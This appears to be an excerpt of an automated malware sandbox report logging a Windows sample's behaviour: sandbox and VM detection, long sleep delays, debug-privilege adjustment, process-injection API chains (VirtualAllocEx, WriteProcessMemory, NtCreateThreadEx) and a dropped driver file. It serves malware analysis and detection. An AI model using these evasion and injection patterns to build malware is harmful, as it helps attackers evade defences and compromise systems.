            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\dialer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Contains functionality to compare user and computer (likely to detect sandboxes)
            Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,68_2_0000000140001860
            Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,73_2_0000000140001860
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5356Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4472Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4593Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1870Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8665
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 674
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4042
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1727
            Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9970
            Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9942
            Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9871
            Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 560
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeDropped PE file which has not been started: C:\Windows\Temp\ihddniqxcjeb.sysJump to dropped file
            Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
            Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
            Source: C:\Windows\System32\dialer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_24-197
            Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
            Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\conhost.exeAPI coverage: 5.0 %
            Source: C:\Windows\System32\dialer.exeAPI coverage: 0.9 %
            Source: C:\Windows\System32\conhost.exeAPI coverage: 5.0 %
            Source: C:\Windows\System32\winlogon.exeAPI coverage: 6.0 %
            Source: C:\Windows\System32\lsass.exeAPI coverage: 7.7 %
            Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 5356 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep count: 4472 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7560Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 4593 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep count: 1870 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep count: 8665 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1104Thread sleep count: 674 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 4042 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6868Thread sleep count: 1727 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 6996Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\winlogon.exe TID: 3104Thread sleep count: 9970 > 30
            Source: C:\Windows\System32\winlogon.exe TID: 3104Thread sleep time: -9970000s >= -30000s
            Source: C:\Windows\System32\lsass.exe TID: 7424Thread sleep count: 9942 > 30
            Source: C:\Windows\System32\lsass.exe TID: 7424Thread sleep time: -9942000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 6788Thread sleep count: 242 > 30
            Source: C:\Windows\System32\svchost.exe TID: 6788Thread sleep time: -242000s >= -30000s
            Source: C:\Windows\System32\dwm.exe TID: 7304Thread sleep count: 9871 > 30
            Source: C:\Windows\System32\dwm.exe TID: 7304Thread sleep time: -9871000s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 2484Thread sleep count: 560 > 30
            Source: C:\Windows\System32\dllhost.exe TID: 2484Thread sleep time: -56000s >= -30000s
            Source: C:\Windows\System32\dllhost.exe TID: 5580Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7444Thread sleep count: 249 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7444Thread sleep time: -249000s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7592Thread sleep count: 252 > 30
            Source: C:\Windows\System32\svchost.exe TID: 7592Thread sleep time: -252000s >= -30000s
            Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
            Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29E110 FindFirstFileExW,31_2_000002408A29E110
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AE110 FindFirstFileExW,67_2_0000014ECB4AE110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64E110 FindFirstFileExW,69_2_00000225DC64E110
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67E110 FindFirstFileExW,69_2_00000225DC67E110
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AEE110 FindFirstFileExW,70_2_00000202C0AEE110
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130E110 FindFirstFileExW,71_2_000002A66130E110
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0E110 FindFirstFileExW,72_2_000002BAAEE0E110
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_000002488060E110 FindFirstFileExW,73_2_000002488060E110
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
            Source: svchost.exe, 00000047.00000002.2938262651.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end nodegraph_65-91
            Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A2981C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002408A2981C0
            Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,65_2_0000000140832D30
            Source: C:\Windows\System32\dialer.exeCode function: 24_2_0000000140001C9C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,24_2_0000000140001C9C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A298528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_000002408A298528
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A2981C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002408A2981C0
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A29D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_000002408A29D6D4
            Source: C:\Windows\System32\dialer.exeCode function: 64_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,64_2_0000000140001160
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4A81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_0000014ECB4A81C0
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4AD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,67_2_0000014ECB4AD6D4
            Source: C:\Windows\System32\conhost.exeCode function: 67_2_0000014ECB4A8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,67_2_0000014ECB4A8528
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6481C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC6481C0
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC64D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC64D6D4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC648528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,69_2_00000225DC648528
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC6781C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC6781C0
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC67D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_00000225DC67D6D4
            Source: C:\Windows\System32\winlogon.exeCode function: 69_2_00000225DC678528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,69_2_00000225DC678528
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AED6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00000202C0AED6D4
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_00000202C0AE81C0
            Source: C:\Windows\System32\lsass.exeCode function: 70_2_00000202C0AE8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,70_2_00000202C0AE8528
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A66130D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_000002A66130D6D4
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A661308528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,71_2_000002A661308528
            Source: C:\Windows\System32\svchost.exeCode function: 71_2_000002A6613081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,71_2_000002A6613081C0
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_000002BAAEE081C0
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE0D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_000002BAAEE0D6D4
            Source: C:\Windows\System32\dwm.exeCode function: 72_2_000002BAAEE08528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,72_2_000002BAAEE08528
            Source: C:\Windows\System32\dllhost.exeCode function: 73_2_00000248806081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,73_2_00000248806081C0
